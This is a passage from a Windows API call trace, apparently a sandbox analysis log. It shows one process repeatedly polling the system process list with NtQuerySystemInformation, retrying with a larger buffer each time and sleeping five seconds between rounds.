RegionSize=0xdea68*=0x10000) returned 0x0 [0226.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.115] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.151] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.170] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.179] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.188] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.195] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.211] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.219] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.226] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.233] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.240] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.254] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.268] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0226.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0226.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0226.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0226.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0226.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0226.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 